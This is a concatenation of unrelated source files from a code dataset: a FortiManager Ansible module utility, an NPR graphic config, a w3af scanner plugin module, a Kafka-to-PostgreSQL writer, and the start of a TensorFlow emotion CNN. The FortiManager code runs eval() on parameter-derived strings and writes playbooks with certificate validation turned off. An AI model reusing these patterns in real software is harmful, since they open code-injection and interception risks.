continue
token_2 = tokens[-2]
token_1 = tokens[-1]
if '{%s}' % (token_2) == token_1 and token_2 not in _param_set:
_param_set.append(token_2)
return _param_set
def process_rename(self, metadata):
params = self.module.params
if params['rename']['selector'] not in metadata:
raise AssertionError('unknown selector: %s' % (params['rename']['selector']))
selector = params['rename']['selector']
rename_urls = metadata[selector]['urls']
rename_mkey = metadata[selector]['mkey']
rename_params = metadata[selector]['params']
for _url_param in self.__extract_renamed_urls(rename_urls):
if _url_param not in rename_params:
rename_params.append(_url_param)
rename_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(rename_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
real_params_keys = set()
if self.module.params['rename']['self']:
real_params_keys = set(self.module.params['rename']['self'].keys())
if real_params_keys != set(rename_params):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(rename_params), list(real_params_keys)))
url = None
if 'adom' in rename_params and not rename_urls[0].endswith('{adom}'):
if params['rename']['self']['adom'] == 'global':
for _url in rename_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in rename_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = rename_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (rename_urls))
_param_applied = list()
for _param in rename_params:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, params['rename']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in rename_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = params['rename']['self'][_param]
url = url.replace(token_hint, token)
if rename_mkey and rename_mkey not in params['rename']['target']:
            self.module.fail_json(msg='Must give the primary key/value in target: %s!' % (rename_mkey))
api_params = [{'url': url,
'data': params['rename']['target']}]
response = self.conn.send_request('update', api_params)
self.do_exit(response)
def process_clone(self, metadata):
if self.module.params['clone']['selector'] not in metadata:
            raise AssertionError('unknown selector: %s' % (self.module.params['clone']['selector']))
selector = self.module.params['clone']['selector']
clone_params_schema = metadata[selector]['params']
clone_urls = metadata[selector]['urls']
clone_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(clone_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
real_params_keys = set()
if self.module.params['clone']['self']:
real_params_keys = set(self.module.params['clone']['self'].keys())
if real_params_keys != set(clone_params_schema):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(clone_params_schema), list(real_params_keys)))
url = None
if 'adom' in clone_params_schema and not clone_urls[0].endswith('{adom}'):
if self.module.params['clone']['self']['adom'] == 'global':
for _url in clone_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in clone_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = clone_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (clone_urls))
_param_applied = list()
for _param in clone_params_schema:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, self.module.params['clone']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in clone_params_schema:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['clone']['self'][_param]
url = url.replace(token_hint, token)
mkey = metadata[selector]['mkey']
if mkey and mkey not in self.module.params['clone']['target']:
self.module.fail_json(msg='Must give the primary key/value in target: %s!' % (mkey))
api_params = [{'url': url,
'data': self.module.params['clone']['target']}]
response = self.conn.send_request('clone', api_params)
self.do_exit(response)
def process_move(self, metadata):
if self.module.params['move']['selector'] not in metadata:
            raise AssertionError('unknown selector: %s' % (self.module.params['move']['selector']))
selector = self.module.params['move']['selector']
move_params = metadata[selector]['params']
move_urls = metadata[selector]['urls']
move_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(move_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
if not len(move_urls):
raise AssertionError('unexpected move urls set')
real_params_keys = set()
if self.module.params['move']['self']:
real_params_keys = set(self.module.params['move']['self'].keys())
if real_params_keys != set(move_params):
self.module.fail_json(msg='expect params in self:%s, given params:%s' % (list(move_params), list(real_params_keys)))
url = None
if 'adom' in move_params and not move_urls[0].endswith('{adom}'):
if self.module.params['move']['self']['adom'] == 'global':
for _url in move_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in move_urls:
if '/adom/{adom}/' in _url:
url = _url
break
else:
url = move_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (move_urls))
_param_applied = list()
for _param in move_params:
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, self.module.params['move']['self'][_param])
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in move_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['move']['self'][_param]
url = url.replace(token_hint, token)
api_params = [{'url': url,
'option': self.module.params['move']['action'],
'target': self.module.params['move']['target']}]
response = self.conn.send_request('move', api_params)
self.do_exit(response)
def __fix_remote_object_internal(self, robject, module_schema, log):
if type(robject) is not dict:
return True
need_bypass = False
keys_to_delete = list()
for key in robject:
value = robject[key]
# keys are internal in FMG devices.
if key not in module_schema:
keys_to_delete.append(key)
continue
# key is found
attr_schema = module_schema[key]
attr_type = attr_schema['type']
if attr_type in ['str', 'int']:
# Do immediate fix.
if type(value) is list:
if len(value) == 1:
robject[key] = value[0]
log.write('\tfix list-to-atomic key:%s\n' % (key))
else:
need_bypass = True
elif type(value) is dict:
need_bypass = True
if not value or value == 'null':
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
elif attr_type == 'dict':
if 'options' in attr_schema and type(value) is dict:
need_bypass |= self.__fix_remote_object_internal(value, attr_schema['options'], log)
else:
need_bypass = True
if not value or value == 'null':
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
elif attr_type == 'list':
if 'options' in attr_schema and type(value) is list:
for sub_value in value:
need_bypass |= self.__fix_remote_object_internal(sub_value, attr_schema['options'], log)
else:
need_bypass = True
if type(value) is list and not len(value) or value == 'null' or not value:
log.write('\tdelete empty key:%s\n' % (key))
keys_to_delete.append(key)
else:
                raise AssertionError('Unexpected attribute type.')
for key in keys_to_delete:
log.write('\tdelete unrecognized key:%s\n' % (key))
del robject[key]
return need_bypass
def __append_whiteblank_per_line(self, blob, num_of_blank):
ret = ' ' * num_of_blank
ret += blob.replace('\n', '\n%s' % (' ' * num_of_blank))
return ret
def _generate_playbook(self, counter, export_path, selector, robject, state_present, need_bypass, url_params, params_schema, log):
        prefix_text = '''- name: Exported Playbook
hosts: fortimanager00
connection: httpapi
collections:
- fortinet.fortimanager
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
'''
with open('%s/%s_%s.yml' % (export_path, selector, counter), 'w') as f:
f.write(prefix_text)
f.write(' - name: exported config for %s\n' % (selector))
f.write(' fmgr_%s:\n' % (selector))
if need_bypass:
f.write(' bypass_validation: true\n')
if state_present:
f.write(' state: present\n')
for url_param_key in params_schema:
if url_param_key not in url_params:
continue
url_param_value = url_params[url_param_key]
f.write(' %s: %s\n' % (url_param_key, url_param_value))
f.write(' %s:\n' % (selector))
f.write(self.__append_whiteblank_per_line(yaml.dump(robject), 8))
log.write('\texported playbook: %s/%s_%s.yml\n' % (export_path, selector, counter))
self._nr_exported_playbooks += 1
def _process_export_response(self, selector, response, schema_invt, log, export_path, url_params, params_schema):
response_code = response[0]
response_data = response[1]
if response_code != 0 or 'data' not in response_data:
log.write('\tno configuration data found\n')
return
if selector not in schema_invt:
log.write('\trequested object has no corresponding ansible module\n')
return
state_present = schema_invt[selector]['stated']
module_schema = schema_invt[selector]['options']
remote_objects = response_data['data']
counter = 0
if type(remote_objects) is list:
for remote_object in remote_objects:
need_bypass = self.__fix_remote_object_internal(remote_object, module_schema, log)
self._generate_playbook(counter, export_path, selector, remote_object, state_present, need_bypass, url_params, params_schema, log)
counter += 1
elif type(remote_objects) is dict:
need_bypass = self.__fix_remote_object_internal(remote_objects, module_schema, log)
self._generate_playbook(counter, export_path, selector, remote_objects, state_present, need_bypass, url_params, params_schema, log)
counter += 1
if not counter:
self._nr_valid_selectors += 1
def _process_export_per_selector(self, selector, schema, param, log, export_path, process, schema_invt):
# make urls from schema and parameters provided.
url = None
export_urls = schema['urls']
if 'adom' in param and not export_urls[0].endswith('{adom}'):
if param['adom'] == 'global':
for _url in export_urls:
if '/global/' in _url:
url = _url
break
else:
for _url in export_urls:
if '/adom/{adom}/' in _url:
url = _url
break
if not url:
url = export_urls[0]
_param_applied = list()
for _param_key in param:
_param_value = param[_param_key]
if _param_key == 'adom' and _param_value.lower() == 'global':
continue
token_hint = '/%s/{%s}' % (_param_key, _param_key)
token = '/%s/%s' % (_param_key, _param_value)
if token_hint in url:
_param_applied.append(_param_key)
url = url.replace(token_hint, token)
for _param_key in param:
if _param_key in _param_applied:
continue
if _param_key == 'adom' and _param_value.lower() == 'global':
continue
token_hint = '{%s}' % (_param_key)
token = param[_param_key]
url = url.replace(token_hint, token)
tokens = url.split('/')
if tokens[-1].startswith('{') and tokens[-1].endswith('}'):
new_url = ''
for token in tokens[:-1]:
new_url += '/%s' % (token)
new_url = new_url.replace('//', '/')
url = new_url
unresolved_parameter = False
tokens = url.split('/')
for token in tokens:
if token.startswith('{') and token.endswith('}'):
unresolved_parameter = True
break
log.write('[%s]exporting: %s\n' % (process, selector))
log.write('\turl: %s\n' % (url))
if unresolved_parameter:
log.write('\t unknown parameter, skipped!\n')
return
response = self.conn.send_request('get', [{'url': url}])
self._process_export_response(selector, response, schema_invt, log, export_path, param, schema['params'])
def process_export(self, metadata):
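        # Export workflow: for each requested selector (or 'all'), fetch the live
        # configuration over the JSON-RPC 'get' method and write it back out as
        # ready-to-run fmgr_* playbooks under the export path, logging to export.log.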
from ansible_collections.fortinet.fortimanager.plugins.module_utils.exported_schema import schemas as exported_schema_inventory
export_selectors = self.module.params['export_playbooks']['selector']
export_path = './'
if 'path' in self.module.params['export_playbooks'] and self.module.params['export_playbooks']['path']:
export_path = self.module.params['export_playbooks']['path']
log = open('%s/export.log' % (export_path), 'w')
log.write('Export time: %s\n' % (str(datetime.datetime.now())))
# Check required parameter.
for selector in export_selectors:
if selector == 'all':
continue
export_meta = metadata[selector]
export_meta_param = export_meta['params']
export_meta_urls = export_meta['urls']
if not self.module.params['export_playbooks']['params'] or selector not in self.module.params['export_playbooks']['params']:
self.module.fail_json('parameter export_playbooks->params needs entry:%s' % (selector))
if not len(export_meta_urls):
raise AssertionError('Invalid schema.')
# extracted required parameter.
url_tokens = export_meta_urls[0].split('/')
required_params = list()
for _param in export_meta_param:
if '{%s}' % (_param) == url_tokens[-1]:
continue
required_params.append(_param)
for _param in required_params:
if _param not in self.module.params['export_playbooks']['params'][selector]:
self.module.fail_json('required parameters for selector %s: %s' % (selector, required_params))
# Check required parameter for selector: all
if 'all' in export_selectors:
if 'all' not in self.module.params['export_playbooks']['params'] or 'adom' not in self.module.params['export_playbooks']['params']['all']:
self.module.fail_json('required parameters for selector %s: %s' % ('all', ['adom']))
# process specific selector and 'all'
selectors_to_process = dict()
for selector in export_selectors:
if selector == 'all':
continue
selectors_to_process[selector] = (metadata[selector], self.module.params['export_playbooks']['params'][selector])
if 'all' in export_selectors:
for selector in metadata:
chosen = True
if not len(metadata[selector]['urls']):
raise AssertionError('Invalid Schema.')
url_tokens = metadata[selector]['urls'][0].split('/')
for _param in metadata[selector]['params']:
if _param == 'adom':
continue
elif '{%s}' % (_param) != url_tokens[-1]:
                        chosen = False
break
if not chosen or selector in selectors_to_process:
continue
selectors_to_process[selector] = (metadata[selector], self.module.params['export_playbooks']['params']['all'])
process_counter = 1
number_selectors = len(selectors_to_process)
for selector in selectors_to_process:
self._process_export_per_selector(selector,
selectors_to_process[selector][0],
selectors_to_process[selector][1],
log,
export_path,
'%s/%s' % (process_counter, number_selectors),
exported_schema_inventory)
process_counter += 1
self.module.exit_json(number_of_selectors=number_selectors,
number_of_valid_selectors=self._nr_valid_selectors,
number_of_exported_playbooks=self._nr_exported_playbooks,
system_infomation=self.system_status)
def process_fact(self, metadata):
if self.module.params['facts']['selector'] not in metadata:
            raise AssertionError('unknown selector: %s' % (self.module.params['facts']['selector']))
selector = self.module.params['facts']['selector']
fact_params = metadata[selector]['params']
fact_urls = metadata[selector]['urls']
fact_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(fact_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
if not len(fact_urls):
raise AssertionError('unexpected fact urls set')
real_params_keys = set()
if self.module.params['facts']['params']:
real_params_keys = set(self.module.params['facts']['params'].keys())
if real_params_keys != set(fact_params):
self.module.fail_json(msg='expect params:%s, given params:%s' % (list(fact_params), list(real_params_keys)))
url = None
if 'adom' in fact_params and not fact_urls[0].endswith('{adom}'):
if self.module.params['facts']['params']['adom'] == 'global':
for _url in fact_urls:
if '/global/' in _url:
url = _url
break
elif self.module.params['facts']['params']['adom'] != '' and self.module.params['facts']['params']['adom'] is not None:
for _url in fact_urls:
if '/adom/{adom}/' in _url:
url = _url
# url = _url.replace('/adom/{adom}/', '/adom/%s/' % (self.module.params['facts']['params']['adom']))
break
else:
# choose default URL which is for all domains
for _url in fact_urls:
if '/global/' not in _url and '/adom/{adom}/' not in _url:
url = _url
break
else:
url = fact_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (fact_urls))
_param_applied = list()
for _param in fact_params:
_the_param = self.module.params['facts']['params'][_param]
if self.module.params['facts']['params'][_param] is None:
_the_param = ''
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, _the_param)
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in fact_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['facts']['params'][_param] if self.module.params['facts']['params'][_param] else ''
url = url.replace(token_hint, token)
# Other Filters and Sorters
filters = self.module.params['facts']['filter']
sortings = self.module.params['facts']['sortings']
fields = self.module.params['facts']['fields']
options = self.module.params['facts']['option']
api_params = [{'url': url}]
if filters:
api_params[0]['filter'] = filters
if sortings:
api_params[0]['sortings'] = sortings
if fields:
api_params[0]['fields'] = fields
if options:
api_params[0]['option'] = options
# Now issue the request.
response = self.conn.send_request('get', api_params)
self.do_exit(response)
def process_curd(self, argument_specs=None):
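        # Full CRUD entry point: check schema/version compatibility, derive the
        # primary-key value (optionally via a 'complex:' expression evaluated
        # against the parameters), then create, update, or delete accordingly.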
if 'state' not in self.module.params:
raise AssertionError('parameter state is expected')
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
has_mkey = self.module_primary_key is not None and type(self.module.params[self.module_level2_name]) is dict
if has_mkey:
mvalue = ''
if self.module_primary_key.startswith('complex:'):
mvalue_exec_string = self.module_primary_key[len('complex:'):]
mvalue_exec_string = mvalue_exec_string.replace('{{module}}', 'self.module.params[self.module_level2_name]')
# mvalue_exec_string = 'mvalue = %s' % (mvalue_exec_string)
# exec(mvalue_exec_string)
# On Windows Platform, exec() call doesn't take effect.
mvalue = eval(mvalue_exec_string)
else:
mvalue = self.module.params[self.module_level2_name][self.module_primary_key]
self.do_exit(self._process_with_mkey(mvalue))
else:
self.do_exit(self._process_without_mkey())
def __tailor_attributes(self, data):
if type(data) == dict:
rdata = dict()
for key in data:
value = data[key]
if value is None:
continue
rdata[key] = self.__tailor_attributes(value)
return rdata
elif type(data) == list:
rdata = list()
for item in data:
if item is None:
continue
rdata.append(self.__tailor_attributes(item))
return rdata
else:
if data is None:
raise AssertionError('data is expected to be not none')
return data
def process_partial_curd(self, argument_specs=None):
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
the_url = self.jrpc_urls[0]
if 'adom' in self.url_params and not self.jrpc_urls[0].endswith('{adom}'):
if self.module.params['adom'] == 'global':
for _url in self.jrpc_urls:
if '/global/' in _url:
the_url = _url
break
else:
for _url in self.jrpc_urls:
if '/adom/{adom}/' in _url:
the_url = _url
break
for _param in self.url_params:
token_hint = '{%s}' % (_param)
token = '%s' % (self.module.params[_param])
the_url = the_url.replace(token_hint, token)
the_url = the_url.rstrip('/')
api_params = [{'url': the_url}]
if self.module_level2_name in self.module.params:
if not self.top_level_schema_name:
raise AssertionError('top level schem name is not supposed to be empty')
api_params[0][self.top_level_schema_name] = self.__tailor_attributes(self.module.params[self.module_level2_name])
response = self.conn.send_request(self._propose_method('set'), api_params)
self.do_exit(response)
def check_versioning_mismatch(self, track, schema, params):
if not params or not schema:
return
param_type = schema['type'] if 'type' in schema else None
revisions = schema['revision'] if 'revision' in schema else None
matched, checking_message = self._version_matched(revisions)
if not matched:
param_path = track[0]
for _param in track[1:]:
param_path += '-->%s' % (_param)
self.version_check_warnings.append('param: %s %s' % (param_path, checking_message))
if param_type == 'dict' and 'options' in schema:
if type(params) is not dict:
raise AssertionError()
for sub_param_key in params:
sub_param = params[sub_param_key]
if sub_param_key in schema['options']:
sub_schema = schema['options'][sub_param_key]
track.append(sub_param_key)
self.check_versioning_mismatch(track, sub_schema, sub_param)
del track[-1]
elif param_type == 'list' and 'options' in schema:
if type(params) is not list:
raise AssertionError()
for grouped_param in params:
if type(grouped_param) is not dict:
raise AssertionError()
for sub_param_key in grouped_param:
sub_param = grouped_param[sub_param_key]
if sub_param_key in schema['options']:
sub_schema = schema['options'][sub_param_key]
track.append(sub_param_key)
self.check_versioning_mismatch(track, sub_schema, sub_param)
del track[-1]
def validate_parameters(self, pvb):
for blob in pvb:
attribute_path = blob['attribute_path']
pointer = self.module.params
ignored = False
for attr in attribute_path:
if attr not in pointer:
# If the parameter is not given, ignore that.
ignored = True
break
pointer = pointer[attr]
if ignored:
continue
lambda_expr = blob['lambda']
lambda_expr = lambda_expr.replace('$', str(pointer))
eval_result = eval(lambda_expr)
if not eval_result:
if 'fail_action' not in blob or blob['fail_action'] == 'warn':
self.module.warn(blob['hint_message'])
else:
# assert blob['fail_action'] == 'quit':
self.module.fail_json(msg=blob['hint_message'])
def _do_final_exit(self, rc, result):
# XXX: as with https://github.com/fortinet/ansible-fortimanager-generic.
# the failing conditions priority: failed_when > rc_failed > rc_succeeded.
failed = rc != 0
changed = rc == 0
if 'response_code' not in result:
raise AssertionError('response_code should be in result')
if self.module.params['rc_failed']:
for rc_code in self.module.params['rc_failed']:
if str(result['response_code']) == str(rc_code):
failed = True
result['result_code_overriding'] = 'rc code:%s is overridden to failure' % (rc_code)
elif self.module.params['rc_succeeded']:
for rc_code in self.module.params['rc_succeeded']:
if str(result['response_code']) == str(rc_code):
failed = False
result['result_code_overriding'] = 'rc code:%s is overridden to success' % (rc_code)
if self.system_status:
result['system_information'] = self.system_status
if len(self.version_check_warnings):
version_check_warning = dict()
version_check_warning['mismatches'] = self.version_check_warnings
if not self.system_status:
raise AssertionError()
version_check_warning['system_version'] = 'v%s.%s.%s' % (self.system_status['Major'],
self.system_status['Minor'],
self.system_status['Patch'])
self.module.warn('Ansible has detected version mismatch between FortiManager and your playbook, see more details by appending option -vvv')
self.module.exit_json(rc=rc, meta=result, version_check_warning=version_check_warning, failed=failed, changed=changed)
else:
self.module.exit_json(rc=rc, meta=result, failed=failed, changed=changed)
def do_nonexist_exit(self):
rc = 0
result = dict()
result['response_code'] = -3
result['response_message'] = 'object not exist'
self._do_final_exit(rc, result)
def do_exit(self, response):
rc = response[0]
result = dict()
result['response_data'] = list()
if 'data' in response[1]:
result['response_data'] = response[1]['data']
result['response_code'] = response[1]['status']['code']
result['response_message'] = response[1]['status']['message']
result['request_url'] = response[1]['url']
# XXX:Do further status mapping
self._do_final_exit(rc, result)
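# Wiring sketch (hypothetical, for orientation only): a generated fmgr_* module
# builds a NAPIManager from its schema-derived tables and delegates to one of the
# process_* entry points. `module_arg_spec`, `jrpc_urls`, `perobject_jrpc_urls`
# and the selector name below are placeholders, not definitions from this file.
#
#   module = AnsibleModule(argument_spec=check_parameter_bypass(module_arg_spec, 'firewall_address'),
#                          supports_check_mode=False)
#   connection = Connection(module._socket_path)
#   fmgr = NAPIManager(jrpc_urls, perobject_jrpc_urls, 'name', ['adom'],
#                      module, connection, top_level_schema_name='data')
#   fmgr.process_curd(argument_specs=module_arg_spec)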
| 48.091266 | 151 | 0.58088 |
4a226bfd1bfe962ebbdf611286781edcfe44c34f | 305 | py | Python | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 14 | 2015-05-08T13:41:51.000Z | 2021-02-24T12:34:55.000Z | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | null | null | null | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 7 | 2015-04-04T04:45:54.000Z | 2021-02-18T11:12:48.000Z |
#!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1wFUxIo3otpDWH1pMC1R8D_finHQDqHsDPueQ3QuGRbg'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.785714 | 77 | 0.819672 |
4a226ca4af057fb89923ee9b7f5eae3b1731e11c | 2,076 | py | Python | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | null | null | null | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | null | null | null | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | 2 | 2021-07-13T10:14:05.000Z | 2021-07-21T09:08:11.000Z |
#!/usr/bin/python3
# coding=utf-8
# Copyright 2021 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Module """
from pathlib import Path
import flask # pylint: disable=E0401
import jinja2 # pylint: disable=E0401
from pylon.core.tools import log # pylint: disable=E0611,E0401
from pylon.core.tools import module # pylint: disable=E0611,E0401
from .components.render_w3af import render_w3af_card
class Module(module.ModuleModel):
""" Galloper module """
def __init__(self, settings, root_path, context):
self.settings = settings
self.root_path = root_path
self.context = context
def init(self):
""" Init module """
log.info("Initializing module")
bp = flask.Blueprint(
"w3af", "plugins.security_scanner_w3af.plugin",
static_folder=str(Path(__file__).parents[0] / "static"),
static_url_path='/w3af/static/'
)
bp.jinja_loader = jinja2.ChoiceLoader([
jinja2.loaders.PackageLoader("plugins.security_scanner_w3af", "templates"),
])
# Register in app
self.context.app.register_blueprint(bp)
# Register template slot callback
self.context.slot_manager.register_callback("security_scanners", render_w3af_card)
from .rpc_worker import get_scanner_parameters
self.context.rpc_manager.register_function(get_scanner_parameters, name='w3af')
def deinit(self): # pylint: disable=R0201
""" De-init module """
log.info("De-initializing module")
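# Consumption sketch (assumptions, not defined in this plugin): other plugins are
# expected to render the "security_scanners" slot to display the card registered
# above, and could retrieve this scanner's parameters through the registered RPC
# name, e.g. context.rpc_manager.call.w3af(...)  # hypothetical call site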
| 35.186441 | 90 | 0.689788 |
4a226d5a5cac389aabfefe959ec12be35fc3e213 | 5,777 | py | Python | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import concurrent.futures
import json
import typing
import time
from kafka import KafkaConsumer
from psycopg2 import connect
from psycopg2.extras import execute_values
from shared.models import CheckResult
from writer.models import WriterSettings
class Worker(object):
""" Worker is checking result handling workflow. """
def __init__(self, config_file_path):
# type: (str) -> None
self.config = WriterSettings.import_from_file(config_file_path) # type: WriterSettings
# copied from `getting started with kafka`
# autocommit is disabled so that messages are not lost in case of polling/parsing error
self.consumer = KafkaConsumer(
self.config.kafka.topic,
auto_offset_reset="earliest",
bootstrap_servers=self.config.kafka.bootstrap_servers,
client_id=self.config.kafka.client,
group_id=self.config.kafka.group,
enable_auto_commit=False,
security_protocol="SSL",
ssl_cafile=self.config.kafka.ssl_ca_file,
ssl_certfile=self.config.kafka.ssl_cert_file,
ssl_keyfile=self.config.kafka.ssl_key_file,
)
def run(self):
if self.config.concurrency.checks == 1:
run_method = self._run_single_thread
else:
run_method = self._run_thread_pool
while True:
messages = self._get_messages() # requesting messages to process
try:
run_method(messages)
finally:
# acknowledge kafka that messages are processed
# some messages can be lost though, due to processing exceptions
self.consumer.commit()
if self.config.interval:
time.sleep(self.config.interval)
else:
# do exactly one check if no interval is specified
break
def _run_single_thread(self, messages):
# type: (typing.Mapping[str, typing.List[CheckResult]]) -> None
"""
Processes websites one by one.
Fails on the first unhandled exception.
"""
for website_url, check_results in messages.items():
exc = self._insert_row_batch(website_url, check_results)
if exc is not None:
raise exc
def _run_thread_pool(self, messages):
# type: (typing.Mapping[str, typing.List[CheckResult]]) -> None
"""
Processes websites using thread pool.
Unhandled exception in one thread doesn't affect other ones,
but "aggregated" exception containing all unhandled
exceptions will be raised in the end.
"""
errors = []
with concurrent.futures.ThreadPoolExecutor(max_workers=self.config.concurrency.checks) as executor:
future_tasks = [executor.submit(self._insert_row_batch, website, check_results)
for website, check_results in messages.items()]
for task in concurrent.futures.as_completed(future_tasks, timeout=self.config.concurrency.timeout):
task_result = task.result()
if task_result is not None:
errors.append(task_result)
if errors:
errors_str = "\n".join([str(exc) for exc in errors])
raise RuntimeError(f"{len(errors)} occurred during processing website check results:\n{errors_str}")
def _get_messages(self):
# type: () -> typing.Mapping[str, typing.List[CheckResult]]
""" Receives and decodes chunk of kafka messages. """
results = {} # website url to check results map
for _ in range(2):
poll_result = self.consumer.poll(
timeout_ms=self.config.kafka.timeout_poll * 1000,
max_records=self.config.kafka.poll_max_messages,
)
for raw_messages in poll_result.values():
for raw_message in raw_messages:
check_result = CheckResult.from_dict(json.loads(raw_message.value))
results.setdefault(check_result.url, []).append(check_result)
return results
def _insert_row_batch(self, website_url, check_results):
# type: (str, typing.List[CheckResult]) -> typing.Optional[Exception]
"""
Uses settings to find out DB table for given url.
Inserts check result into this table.
"""
if not check_results:
return # nothing to insert - nothing to do here
try:
table_name = self.config.websites_tables[website_url]
except KeyError as exc:
raise KeyError(f"DB table settings for url {str(exc)} are not specified")
try:
# assume configuration is trusted source
# otherwise using table_name in sql query like that
# can lead to SQL injection
insert_query = f"insert into {table_name} " \
f"(url, duration, started_at, error, pattern_found, status_code) " \
f"values %s"
# auto commit if there wasn't any exception
with connect(self.config.pg.connection_string) as conn:
with conn.cursor() as cursor:
# insert query params
values = []
for cr in check_results:
values.append((cr.url, cr.duration, cr.started_at, cr.error,
cr.pattern_found, cr.status_code))
execute_values(cursor, insert_query, values, page_size=self.config.pg.page_size)
except Exception as exc:
error = exc
else:
error = None
return error
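if __name__ == "__main__":
    # Usage sketch: the config path below is an assumption; point it at the real
    # writer settings file. One Worker polls Kafka and writes decoded check
    # results to PostgreSQL until stopped (or once, if no interval is configured).
    Worker("config/writer.yaml").run()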
| 38.771812 | 112 | 0.606543 |
4a226d8eb9dbce86aedcb71be5b943f9a4422a4f | 8,141 | py | Python | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 73 | 2017-10-27T22:44:32.000Z | 2021-12-25T18:37:51.000Z | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 3 | 2018-09-20T21:47:21.000Z | 2021-03-14T05:32:41.000Z | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 72 | 2017-11-06T07:08:01.000Z | 2021-11-25T09:00:28.000Z |
import tensorflow as tf
import numpy as np
import os, sys, inspect
from datetime import datetime
import Utility
import matplotlib.pyplot as plt
from tensorflow.python.framework import ops
from sklearn.metrics.classification import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
import warnings
warnings.filterwarnings("ignore")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
ops.reset_default_graph()
np.random.seed(123456789) # for reproducibility
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir", "input/", "Path to data files (train and test)")
tf.flags.DEFINE_string("logs_dir", "Logs/CNN_logs/", "Logging path")
